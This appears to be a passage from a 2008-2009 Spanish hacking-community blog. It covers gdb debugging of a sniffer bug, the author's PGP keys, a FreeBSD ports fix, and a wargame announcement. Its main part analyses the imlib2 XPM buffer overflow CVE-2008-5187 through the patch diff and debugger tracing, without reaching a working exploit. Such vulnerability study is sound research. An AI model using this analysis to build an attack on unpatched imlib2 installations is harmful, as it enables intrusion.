esi            0xbfbfed40	-1077940928
edi            0x0	0
 
eip            0x8048309	0x8048309
eflags         0x246	582
cs             0x33	51
ss             0x3b	59
 
ds             0x3b	59
es             0x3b	59
fs             0x3b	59
gs             0x1b	27
 
(gdb) x/4 0xbfbfecb0
 
0xbfbfecb0:	0x00000003	0x28102000	0x00010000	0x00000000
(gdb) step          
 
[+] ICMP: 74.125.95.147	->	74.125.95.147
 
52					break;
(gdb) x/4 0xbfbfecb0
 
0xbfbfecb0:	0x08062664	0x08066e98	0x08066e98	0x00000000
(gdb) printf "%s\n", 0x08062664
 
[+] ICMP: %s	->	%s
 
 
(gdb) printf "%s\n", 0x08066e98
 
74.125.95.147
(gdb) x/4 0xbfbfecb0
 
0xbfbfecb0:	0x08062664	0x08066e98	0x08066e98	0x00000000

Como pueden ver después de ejecutar el step en la pila tenemos

(gdb) x/4 0xbfbfecb0
0xbfbfecb0: 0x08062664 0x08066e98 0x08066e98 0x00000000
La primera es la cadena de formato:

Código

(gdb) printf "%s\n", 0x08062664
[+] ICMP: %s -> %s

Y las 2 siguientes es la misma IP de Origen

Código

(gdb) printf "%s\n", 0x08066e98
74.125.95.147

en conclusión, el inet_ntoa o algo no esta funcionando bien Tiene un Bug!! Aun que este no es muy dañino.

Y en cambio como mencione en el post si lo ejecutamos desde 2 printf distintos eso no pasa, debido a que la dirección Estática se renueva, ¿Por que no se renueva cuando se mandan los 2 al mismo printf?

Mis llaves PGP

2009-01-06T20:36:00.003-06:00

Bueno anteriormente habia creado una llave RSA utilizando pgp:

Anon@localhost % pgp -h
Pretty Good Privacy(tm) 2.6.3ia

----

Esto lo hice con esa version ya que FreeBSD no me dejaba instalar algunas de las mas recientes.

Sin embargo la llave ya esta en los servidores de llaves publicas, ahora despues de mucho intentar he logrado usar las mismas llaves desde gnupg o gpg como la mayoria lo conoce, despues de tener problemas con el algoritmo IDEA y ver que el sistema puede en algunos años mas ser medianamente obsoleto (si no es que totalmente). Decidi crear Una nueva llave con gpg y firmarla con mi llave anterior, asi que ahora tengo doble trabajo de administrar 2 llaves diferentes, he hecho esto para no revocar la llave anteir, y apartir de ahora ya pueden enviarme archivos cifrados con ambas llaves, aun que encarecidamente sugiero que usen la nueva llave

Llave Anterior RSA:

Key ID: 0xF5B475FD
Fingerprint for RSA Key: 0F 5B BC 84 15 1C 60 D1 B1 53 73 C1 FF 89 10 EE
1024R/F5B475FD Anon <Anon[at]elhacker.net>

Key ID: 0x592F2029
Fingerprint for DSA Key: 178D 0C89 E3B5 2965 6530 20CB 77DE B789 592F 2029
1024D/592F2029 Anon _ (On Anonymous Mode!!) <Anon[at]elhacker.net>

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.9 (FreeBSD)

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
ivZBzNM9TrEmbiFfvC/iP/L+1Q==
=686s
-----END PGP PUBLIC KEY BLOCK-----

Para los que tenian mi llave anterior podran comprobar que esta nueva esta firmada por mi llave anterior, para comprobar su valides.

Un Saludo

Re: Analisis de un Bug: 'imlib2' Library 'load()' CVE-2008-5187

2008-12-05T13:06:00.002-06:00

Bien estos dias voy a estar algo ocupado con lo del trabajo y eso. Solo veremos una tecnica mas de depuracion.
Este nos sirve mas que nada para cuando, el bug se enecunetra en una libreria, tal y como es nuestro caso:

Citar

%truss -f -d -o prueba.truss ./imlib2_convert ./prueba.xpm ./prueba.png

Este comando nos generara un archivo prueba.truss

Mas informacion sobre truss:

Código:

http://fuse4bsd.creo.hu/localcgi/man-cgi.cgi?truss+1

De este lo podemos examinar con:

Citar

%cat prueba.truss

Pero lo que nos interesa es ver que librerias carga:

Citar

%cat prueba.truss | grep open
27161: 0.000555657 open("/etc/libmap.conf",O_RDONLY,0666) ERR#2 'No such file or directory'
27161: 0.000624940 open("/var/run/ld-elf.so.hints",O_RDONLY,00) = 4 (0x4)
27161: 0.001195124 open("/usr/local/lib/libImlib2.so.5",O_RDONLY,00) = 4 (0x4)
27161: 0.002000254 open("/usr/local/lib/libfreetype.so.9",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.002534400 open("/lib/libz.so.4",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.003249575 open("/usr/local/lib/libX11.so.6",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.003975924 open("/usr/local/lib/libXext.so.6",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.004507276 open("/lib/libm.so.5",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.005050921 open("/lib/libc.so.7",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.005640102 open("/usr/local/lib/libXau.so.6",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.006182070 open("/usr/local/lib/libXdmcp.so.6",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.006825169 open("/usr/lib/librpcsvc.so.4",O_RDONLY,027757765154) = 4 (0x4)
27161: 0.010692141 open("/usr/local/lib/imlib2/loaders",O_NONBLOCK,027757765154) = 4 (0x4)
27161: 0.011528560 open("/usr/local/lib/imlib2/loaders/zlib.so",O_RDONLY,00) = 4 (0x4)
27161: 0.012475049 open("/usr/local/lib/imlib2/loaders/xpm.so",O_RDONLY,00) = 4 (0x4)
27161: 0.013366224 open("/usr/local/lib/imlib2/loaders/tiff.so",O_RDONLY,027757765354) = 4 (0x4)
27161: 0.013917132 open("/usr/local/lib/libtiff.so.4",O_RDONLY,05001126346) = 4 (0x4)
27161: 0.014448764 open("/usr/local/lib/libjpeg.so.9",O_RDONLY,027757765314) = 4 (0x4)
27161: 0.016059583 open("/usr/local/lib/imlib2/loaders/tga.so",O_RDONLY,057765354) = 4 (0x4)
27161: 0.017023113 open("/usr/local/lib/imlib2/loaders/pnm.so",O_RDONLY,027757765354) = 4 (0x4)
27161: 0.017904231 open("/usr/local/lib/imlib2/loaders/png.so",O_RDONLY,027757765354) = 4 (0x4)
27161: 0.018456256 open("/usr/local/lib/libpng.so.5",O_RDONLY,05001126346) = 4 (0x4)
27161: 0.019926275 open("/usr/local/lib/imlib2/loaders/lbm.so",O_RDONLY,057765354) = 4 (0x4)
27161: 0.020819685 open("/usr/local/lib/imlib2/loaders/jpeg.so",O_RDONLY,027757764470) = 4 (0x4)
27161: 0.021755837 open("/usr/local/lib/imlib2/loaders/id3.so",O_RDONLY,027757765354) = 4 (0x4)
27161: 0.022305349 open("/usr/local/lib/libid3tag.so.0",O_RDONLY,05001126346) = 4 (0x4)
27161: 0.023608308 open("/usr/local/lib/imlib2/loaders/gif.so",O_RDONLY,027757764470) = 4 (0x4)
27161: 0.024143571 open("/usr/local/lib/libungif.so.5",O_RDONLY,05001126346) = 4 (0x4)
27161: 0.024733031 open("/usr/local/lib/libSM.so.6",O_RDONLY,027757765314) = 4 (0x4)
27161: 0.025264384 open("/usr/local/lib/libICE.so.6",O_RDONLY,027757765314) = 4 (0x4)
27161: 0.027015165 open("/usr/local/lib/imlib2/loaders/bz2.so",O_RDONLY,01) = 4 (0x4)
27161: 0.027678937 open("/usr/lib/libbz2.so.3",O_RDONLY,05001126346) = 4 (0x4)
27161: 0.028755889 open("/usr/local/lib/imlib2/loaders/bmp.so",O_RDONLY,00) = 4 (0x4)
27161: 0.029659915 open("/usr/local/lib/imlib2/loaders/argb.so",O_RDONLY,027757765354) = 4 (0x4)
27161: 0.030491864 open("./prueba.xpm",O_RDONLY,0666) = 4 (0x4)
27161: 0.031230785 open("./prueba.xpm",O_RDONLY,0666) = 4 (0x4)
27161: 0.031834493 open("./prueba.png",O_WRONLY|O_CREAT|O_TRUNC,0666) = 4 (0x4)

Podemos extender la busqueda solo a libredias con "lib" ya que el anterior tambien nos arrojo los archivos que habre como ./prueba.xpm y ./prueba.png que son los uqe nosotros le pasamos.

Filtremos solo xpm y lib

Citar

%cat prueba.truss | grep open |grep lib | grep xpm
27161: 0.012475049 open("/usr/local/lib/imlib2/loaders/xpm.so",O_RDONLY,00) = 4 (0x4)

Vemos que si carga el archivo vulnerable, entonces lo mas probable es que si use la funcion load del archivo loaders_xpm.c para cargar la imagen ./prueba.xpm que le pasamos, seria cuestion de depurarlo un poco mas.

A ver me voy volver loco con tantas archivos.

En el direcctorio de src de imlib2 esta la ruta:

src/modules/loaders

Listo los archivos xpm:

Citar

%ls -l | grep xpm
-rw-r--r-- 1 1000 1000 28911 Dec 5 10:55 loader_xpm.c
-rw-r--r-- 1 root 1000 344 Dec 5 10:55 loader_xpm.lo
-rw-r--r-- 1 root 1000 20032 Dec 5 10:55 loader_xpm.o
-rw-r--r-- 1 root 1000 882 Dec 5 10:55 xpm.la

Tenemos:

loader_xpm.c
loader_xpm.lo
loader_xpm.o
xpm.la

pero el programa carga /usr/local/lib/imlib2/loaders/xpm.so entonces vemos que al instalar la libreria nos menciona lo siguiente:

Citar

Libraries have been installed in:
/usr/local/lib/imlib2/loaders

If you ever happen to want to link against installed libraries
in a given directory, LIBDIR, you must either use libtool, and
specify the full pathname of the library, or use the `-LLIBDIR'
flag during linking and do at least one of the following:
- add LIBDIR to the `LD_LIBRARY_PATH' environment variable
during execution
- add LIBDIR to the `LD_RUN_PATH' environment variable
during linking
- use the `-Wl,--rpath -Wl,LIBDIR' linker flag

See any operating system documentation about shared libraries for
more information, such as the ld(1) and ld.so(8) manual pages.
----------------------------------------------------------------------
/bin/sh ../../../libtool --mode=install /usr/bin/install -c 'xpm.la' '/usr/local/lib/imlib2/loaders/xpm.la'
/usr/bin/install -c .libs/xpm.lai /usr/local/lib/imlib2/loaders/xpm.la
/usr/bin/install -c .libs/xpm.a /usr/local/lib/imlib2/loaders/xpm.a
chmod 644 /usr/local/lib/imlib2/loaders/xpm.a
ranlib /usr/local/lib/imlib2/loaders/xpm.a
----------------------------------------------------------------------

Bueno seguire buscando.

Analisis de un Bug: 'imlib2' Library 'load()' CVE-2008-5187

2008-12-04T13:22:00.001-06:00

Bueno toda esta mania surgio de cuando trate de instalar enlightenment sencillamente me decia que habia un bug en alguna dependecia de este, y no me dejaba instalarlo hasta que actualizara o aplicara el parche.

Mas Info:

FreeBSD: Problema con imlib2-1.4.1.000 (Solucion)

CVE-2008-5187

Advisor Original:

Código:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=505714

Antecedentes

Imlib2 es el succesor de Imlib, Esto no es una nueva version, solo es una bibliotecas totalmente nueva. Imlib2 puede ser completamente instalado aun existiendo Imlib 1.x esto sin ningun problema, ya que efectivamente son diferentes bibliotecas pero con funciones muy similares.
Si bien no forma estrictamente parte de la EFL, la biblioteca es utilizada imlib2 por la EFL para el manejo, visualización y manipulación de gráficos a bajo nivel. Es capaz de cargar y manipular archivos de gráficos de muchos formatos, y también es capaz de mostrar en un X Window System. Los desarrolladores cuentan con imlib2 que es muy optimizado.

XPM es una formato de imagen, basdo en Texto/ASCII Usado pro el X Window System, Su principal Intencion fue para crear Iconos, pixmaps y soportar colores traparentes.

Código:

http://en.wikipedia.org/wiki/X_PixMap

Un ejemplo de una imagen XMP

16*7 black and white pixels.

Citar

/* XPM */
static char *prueba[] = {
"16 7 2 1",
"* c #ffffff",
". c #000000",
"**..*...........",
"*.*.*...........",
"**..*..**.**..**",
"*.*.*.*.*.*..*.*",
"**..*..**.*...**",
"...............*",
".............**."
};

Version: imlib2-1.4.1.000
Codigo Vulnerable: loader_xpm.c
Funcion Vulnerable: load

Analizando el parche tenemos que:

Funcion vulnerable:

Linea 250:

Código:

                            ptr = im->data;
                            end = ptr + (sizeof(DATA32) * w * h);
                            pixels = w * h;
                         }

Funcion NO vulnerable

Linea 250:

Código:

                            ptr = im->data;
                            pixels = w * h;
                            end = ptr + pixels;
                         }

Viendolo solo desde el diff:

Citar

# diff imlib2-1.4.1.000/imlib2-1.4.1.000/src/modules/loaders/loader_xpm.c /usr/ports/graphics/imlib2/work/imlib2-1.4.1.000/src/modules/loaders/loader_xpm.c
251d250
< end = ptr + (sizeof(DATA32) * w * h);
252a252
> end = ptr + pixels;

Al parecer solo la variable end, es la que nos ocaciona el desbordamiento, al utilizarla en otra parte del codigo.

Lo que pasa es que end, es un apuntador al final, sin embargo:

Código:

(sizeof(DATA32) * w * h)

Esto da algo mayor a solo

Código:

pixels = w * h;
end = ptr + pixels;

El punto esta en que la cifra se hace 4 veces mas grande:

Código:

/* standard headers */
#include <X11/Xlib.h>
#include <Imlib2.h>
#include <stdio.h>


int main()      {
        printf("Tamaño de DATA32: %d bytes\n",sizeof(DATA32));
        return 0;
}

Citar

%./imlibtest
Tamaño de DATA32: 4 bytes

Tamaño de DATA32: 4 bytes

Como podemos ver estaba multiplicando el espacio por 4

Las variables pixels,w,h son enteros.
ptr y end son apuntadores a DATA32
im es un apuntador a ImlibImage, el cual es pasao como parametro directamente a la funcion.

Bien ahora probaremos el programa, transformando una Imagen xmp a png xD.

Este ejemplo lo tome de la documentacion de imlib2

Código:

/* standard headers */
#include <X11/Xlib.h>
#include <Imlib2.h>
#include <stdio.h>
#include <string.h>

/* main program */
int main(int argc, char **argv)
{
  /* an image handle */
  Imlib_Image image;
  
  /* if we provided < 2 arguments after the command - exit */
  if (argc != 3) exit(1);
  /* load the image */
  image = imlib_load_image(argv[1]);
  /* if the load was successful */
  if (image)
    {
      char *tmp;
      /* set the image we loaded as the current context image to work on */
      imlib_context_set_image(image);
      /* set the image format to be the format of the extension of our last */
      /* argument - i.e. .png = png, .tif = tiff etc. */
      tmp = strrchr(argv[2], '.');
      if(tmp)
         imlib_image_set_format(tmp + 1);
      /* save the image */
      imlib_save_image(argv[2]);
    }
}

Citar

Now to compile this
cc imlib2_convert.c -o imlib2_convert `imlib2-config --cflags` `imlib2-config --libs`
You now have a program that if used as follows:
./imlib2_convert image1.jpg image2.png

Compilando:

Citar

%cc imlib2_convert.c -o imlib2_convert `imlib2-config --cflags` `imlib2-config --libs`
imlib2_convert.c: In function 'main':
imlib2_convert.c:14: warning: incompatible implicit declaration of built-in function 'exit'

Bueno es un warning pero a mi no me gusta que eso aparezca, le agrego el #include<stdlib.h>

Creado la prueba obtenemos que si transforma la imagen a un png, Segun la documentacion puede transformar de culquier extensión a cualqueir extensión!!

Ahora esto solo es una prueba del funcionamiento, ya que obviamente se mando a llamar a la funcion vulnerable sin embargo se cargo con buenos datos.

Vamos a ver como es que se puede hacer caer esto, Segun el advisor Original la falla fue encontrada con una imagen de 32 * 32 pixeles sin embargo como no se da mas informacion, no nos queda mas que depurar, para esto va a ser necesario modificar el make file de los ports en mi caso FreeBSD, en algunos otros casos va a ser necesario modificar el .configure o diferentes.

Bien, antes de depurar las librerias, vamos a depurar la pequeña aplicacion que compilamos.

Citar

%cc -ggdb imlib2_convert.c -o imlib2_convert `imlib2-config --cflags` `imlib2-config --libs`
%cc -ggdb -static imlib2_convert.c -o imlib2_convert `imlib2-config --cflags` `imlib2-config --libs`
/usr/local/lib/libX11.a(ConnDis.o)(.text+0x9e8): In function `_X11TransConnectDisplay':
: undefined reference to `XauDisposeAuth'
/usr/local/lib/libX11.a(ConnDis.o)(.text+0xcbf): In function `_X11TransConnectDisplay':
: undefined reference to `XauGetBestAuthByAddr'
/usr/local/lib/libX11.a(ConnDis.o)(.text+0xf1a): In function `_X11TransConnectDisplay':
: undefined reference to `XdmcpWrap'

Me marca erros al querer incluirlo estaticamente, tendre que probarlo normal solo con -ggdb y vemos que pasa

Citar

%gdb ./imlib2_convert
GNU gdb 6.1.1 [FreeBSD]
....
This GDB was configured as "i386-marcel-freebsd"...
(gdb) list
1 /* standard headers */
2 #include <X11/Xlib.h>
3 #include <Imlib2.h>
4 #include <stdio.h>
5 #include <string.h>
6 #include <stdlib.h>
7
8 /* main program */
9 int main(int argc, char **argv)
10 {
(gdb) break main
Breakpoint 1 at 0x80486c0: file imlib2_convert.c, line 10.
(gdb) run ./prueba.xpm ./prueba.png
Starting program: /usr/home/Anon/imlib2_convert ./prueba.xpm ./prueba.png

Breakpoint 1, main (argc=Error accessing memory address 0x0: Bad address.
) at imlib2_convert.c:10
10 {
(gdb) step
main (argc=3, argv=0xbfbfec9c) at imlib2_convert.c:15
15 if (argc != 3) exit(1);
(gdb) step
17 image = imlib_load_image(argv[1]);
(gdb) step
19 if (image)
(gdb) step
23 imlib_context_set_image(image);
(gdb)
26 tmp = strrchr(argv[2], '.');
(gdb)
27 printf("extensión: %s\n",tmp);
(gdb)
extensión: .png
28 if(tmp)
(gdb)
29 imlib_image_set_format(tmp + 1);
(gdb)
31 imlib_save_image(argv[2]);
(gdb)
36 }
(gdb)
0x08048649 in _start ()
(gdb)
Single stepping until exit from function _start,
which has no line number information.

Program exited with code 0200.
(gdb) quit

Bueno no entro a la funcion deseada debido al funcionamiento de step, pero igual tratemos de nuevo

:S la cosa se complica, vere a donde llego con esto y si veo que de plano es muy complicado, agrego la informacion de las librerias imlib2

Citar

(gdb) disas imlib_load_image
Dump of assembler code for function imlib_load_image:
0x2808cbe0 <imlib_load_image+0>: push %ebp
0x2808cbe1 <imlib_load_image+1>: mov %esp,%ebp
.....
0x2808cc3e <imlib_load_image+94>: call 0x280a1190 <__imlib_LoadImage>
....
0x2808cc56 <imlib_load_image+118>: mov 0xfffffffc(%ebp),%edi
0x2808cc59 <imlib_load_image+121>: mov %ebp,%esp
0x2808cc5b <imlib_load_image+123>: pop %ebp
0x2808cc5c <imlib_load_image+124>: ret
....
End of assembler dump.

Interesante: __imlib_LoadImage

Existe esta subfuncion que carga la imagen.. pero ya la vi y son como 1000 Lineas de ensamblador xD asi que mejor no.

Bien, compilado todo con opciones -ggdb tanto el programa de ejemplo como la libreria imlib2

Citar

%cc -ggdb -static imlib2_convert.c -o imlib2_convert `imlib2-config --cflags` `imlib2-config --libs`
%gdb ./imlib2_convert>

GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...
(gdb) list
1 /* standard headers */
2 #include <X11/Xlib.h>
3 #include <Imlib2.h>
4 #include <stdio.h>
5 #include <string.h>
6 #include <stdlib.h>
7
8 /* main program */
9 int main(int argc, char **argv)
10 {
(gdb)
11 /* an image handle */
12 Imlib_Image image;
13
14 /* if we provided < 2 arguments after the command - exit */
15 if (argc != 3) exit(1);
16 /* load the image */
17 image = imlib_load_image(argv[1]);
18 /* if the load was successful */
19 if (image)
20 {
(gdb) break 13
Breakpoint 1 at 0x8048224: file imlib2_convert.c, line 13.
(gdb) run ./prueba.xpm ./prueba.png
Starting program: /usr/home/Anon/imlib2_convert ./prueba.xpm ./prueba.png

Breakpoint 1, main (argc=3, argv=0xbfbfec9c) at imlib2_convert.c:15
15 if (argc != 3) exit(1);
(gdb) step
17 image = imlib_load_image(argv[1]);
(gdb) step
imlib_load_image (file=0xbfbfedaa "./prueba.xpm") at api.c:1166
1166 CHECK_CONTEXT(ctx);
(gdb) step
1162 {
(gdb)
1166 CHECK_CONTEXT(ctx);
(gdb)
_imlib_context_get () at api.c:217
217 context = imlib_context_new();

Detengo un poco a la ejecucion para buscar api.c y ver quien es la variable ctx, despues de indagar en todo api.c no veo donde define ctx pero puedeo inferir que se trata de un apuntador a Imlib_Image
Siguiendo con la depuracion vemos hasta donde llega, ahorita solo me interesa saber si el ejemplo que estamos usando, llega a llamar a la funcion load del archivo loader_xpm.c y si esto es asi sabremos
que vamos por buen camino

Citar

(gdb) step
imlib_context_new () at api.c:171
171 ImlibContext *context = malloc(sizeof(ImlibContext));
(gdb)
181 context->anti_alias = 1;
(gdb)
182 context->dither = 0;
(gdb)
183 context->blend = 1;
(gdb)
184 context->color_modifier = NULL;
(gdb)

185 context->operation = IMLIB_OP_COPY;

Cientos de Instrucciones mas y al parecer es, pero creo que no se parace la funcion pero esta pertecene al archivo image.c y la que buscamos es del loader_xpm.c

Citar

(gdb)
__imlib_LoadImage (file=0xbfbfedaa "./prueba.xpm", progress=0, progress_granularity=0 '\0', immediate_load=0 '\0',
dont_cache=0 '\0', er=0x0) at image.c:979
979 if ((im) && (IMAGE_IS_VALID(im)))
(gdb)
975 im = __imlib_FindCachedImage(file);
(gdb)
979 if ((im) && (IMAGE_IS_VALID(im)))

Despues de unas 2000 Instrucciones queda solo una salida Inesperada

Citar

(gdb)
320 free(l);
(gdb)
322 }
(gdb)
__imlib_FileFreeDirList (l=0xbfbfeba8, num=Variable "num" is not available.
) at file.c:320
320 free(l);
(gdb)
Error

Program exited with code 012.

Jaja que cosas pasan xD ya se voy a editar el archivo loader_xpm.c para en caso de que si se mande a llamar Solo mando un "OK loader \n"

Depues de realizar la modificacion xD,vi que no dunciono, o no lo carga el moduo vulnerable:

Citar

%cc -ggdb -static imlib2_convert.c -o imlib2_convert `imlib2-config --cflags` `imlib2-config --libs`
%./imlib2_convert ./prueba.xpm ./prueba.png
Error
%cc imlib2_convert.c -o imlib2_convert `imlib2-config --cflags` `imlib2-config --libs`
%./imlib2_convert ./prueba.xpm ./prueba.png
extensión: .png

No se por que pero si lo compilo con los argumentos -ggdb -static simplemente no lo hace y se le compilo normal si hace lo pedido.

Entonces tendre que mandarle yo mismo el archivo, asi sirve que no paso por tanto filtros. Sin embargo eso sera otro dia.

FreeBSD: Problema con imlib2-1.4.1.000 (Solucion)

2008-12-03T12:31:00.001-06:00

Bien, instalando enlightenment, me sale el error de la dependia antes mencionada, imlib2-1.4.1.000, esto desde los ports

Citar

# cd /usr/ports/graphics/imlib2
# make
===> imlib2-1.4.1.000,2 has known vulnerabilities:
=> imlib2 -- XPM processing buffer overflow vulnerability.
Reference: <http://www.FreeBSD.org/ports/portaudit/910486d5-ba4d-11dd-8f23-0019666436c2.html>
=> Please update your ports tree and try again.
*** Error code 1

Stop in /usr/ports/graphics/imlib2.
*** Error code 1

Stop in /usr/ports/graphics/imlib2.

Version del sistema:

Código:

# uname -a
FreeBSD  7.0-RELEASE FreeBSD 7.0-RELEASE #2: Mon Nov 24 09:02:58 UTC 2008     root@:/usr/src/sys/i386/compile/VGN-N350  i386

Ahora El problema no es que no la pueda instalar, dice que es un problema de seguridad:

Citar

imlib2 -- XPM processing buffer overflow vulnerability.
Reference: <http://www.FreeBSD.org/ports/portaudit/910486d5-ba4d-11dd-8f23-0019666436c2.html>

Si me voy a la pagina de los ports, vemos que ya esta actualizado el make file

http://www.freebsd.org/cgi/cvsweb.cgi/ports/graphics/imlib2/

Citar

- Fix a buffer overflow vulnerability in imlib2. PR: ports/129037 Submitted by...

La informacion acerca del bug esta en

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=505714
http://www.freebsd.org/cgi/query-pr.cgi?pr=129037

Aqui muestrare como instalar correctamente Imlib2 desde los pors de FreeBSD.

En otro post se agrergara como Testear la Vulnerabilidad.

Primero hare una copia de seguridad del Directorio imlib2 dentro de /usr/ports/graphics/

Nota que esto yo lo realizo para posterior analisis.

Citar

# tar cf imlib2.tar imlib2/
# bzip2 -k9 imlib2.tar
# rm imlib2.tar
# ls -Gla imlib*.*
-rw-r--r-- 1 root 100 2360 Dec 3 11:06 imlib2.tar.bz2

Aqui debemos borrar el directorio imlib2

Código:

#rm -r imlib2/

Descargamos el Tarball del directorio del port de
http://www.freebsd.org/cgi/cvsweb.cgi/ports/graphics/imlib2/imlib2.tar.gz?tarball=1

Descomprimimos

Código:

# tar xvf imlib2.tar.gz
# cd imlib2
# make && make install

Y ahora si podemos ir al directorio de enlightenment y continuar su instalacion.

saludos y espero a alguien le sirva

2008-12-01T08:44:00.001-06:00

En Windows Vista el cliente de telnet no está instalado por defecto. Si queremos usarlo tendremos que marcarlo en Inicio -> Panel de Control -> Programas -> Activar o desactivar las características de Windows.

Ahi buscamos en la lista Telnet u algun otro cliente que queramos.

Esto lo menciono por que se me ha hecho muy dificil poner NC en algunas computadoras por los antivirus.

En sistemas Unix/Linux el NC viene generalmente de forma predeterminada.

Torneo de explotacion de servidores

2008-11-16T14:31:00.001-06:00

Sabemos que muchos de ustedes querian explotar vulnerabilidades en aplicaciones binarias, como buffer overflows, heap overflows, etc..asi tambien nos han pedido pruebas de vulnerar un servidor.

En fin, creemos eso es una buena idea, pero no podemos montar tales pruebas en un servidor nuestro por seguridad, y no lo podemos virtualizar, por rendimiento.. asi que Anon organizara un wargame de este tipo, y le pedi que si podia hacernos el favor de organizarlo para los usuarios de warzone, y dijo que si! entonces..

El dia Sabado 29 de Noviembre del 2008 a media noche, horario GMT (Meridiano de Greenwich/Casablanca), 6:00 pm en la ciudad de mexico (GMT-6), 9:00pm en Buenos Aires (GMT-3), 1:00 am en Madrid (GMT+1), se publicara en warzone una prueba en la cual los usuarios podran obtener la direccion del wargame, junto con sus datos de inicio de sesion.

El objetivo sera ir pasando desde 4 niveles, explotando vulnerabilidades en los ejecutables dentro del mismo, permisos, etcetera.

Los primeros 5 que pasen la prueba, se les daran 30 puntos en warzone, asi como una promocion de 2 rangos (maximo rango: elite, los que ya esten en elite, pasaran a nightmare.), una cuenta de correo @elhacker.net, asi como acceso a todos sus servicios.

